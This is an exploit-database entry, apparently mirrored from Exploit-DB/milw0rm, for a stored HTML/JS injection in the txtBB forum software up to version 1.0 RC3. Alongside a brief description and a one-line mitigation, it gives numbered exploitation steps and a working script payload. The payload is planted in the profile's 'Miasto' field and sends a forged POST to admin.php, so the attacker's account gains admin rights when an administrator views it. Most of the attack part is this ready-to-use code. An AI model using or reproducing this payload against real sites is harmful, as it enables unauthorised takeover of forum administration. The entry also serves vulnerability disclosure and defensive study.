txtBB - exploit.company

vendor:

txtBB

by:

cOndemned

8.8

CVSS

HIGH

HTML/JS Injection

CWE

Product Name: txtBB

Affected Version From: txtBB <= 1.0 RC3

Affected Version To: txtBB <= 1.0 RC3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

This exploit allows an attacker to inject malicious JavaScript code into the 'Miasto' field of the txtBB <= 1.0 RC3 application. When an admin enters the attacker's account, the malicious code is executed and the attacker's user is granted admin rights.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.

Source

Exploit-DB raw data:

<!--

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
By cOndemned
	
Greetz: 
	ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ;)


Exploitation:
	1. Create an account 
	2. Go to http://[host]/[txtbb10RC3_path]/index.php?type=account 
	3. Put exploit code into one of the fields ex. "Miasto" ([code] + City name)
	4. When admin enters U'r account - pwn3d - Your user will get admin rights


Exploit Source :

-->

<script>

var req = new XMLHttpRequest(); 

req.open('POST', 'admin.php?action=users&type=edit&login=USER_NICK&save=1', false); 
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); 
req.send('signature=&avatar=&type=3&password=&submit=Zapisz');

</script>

# milw0rm.com [2009-02-05]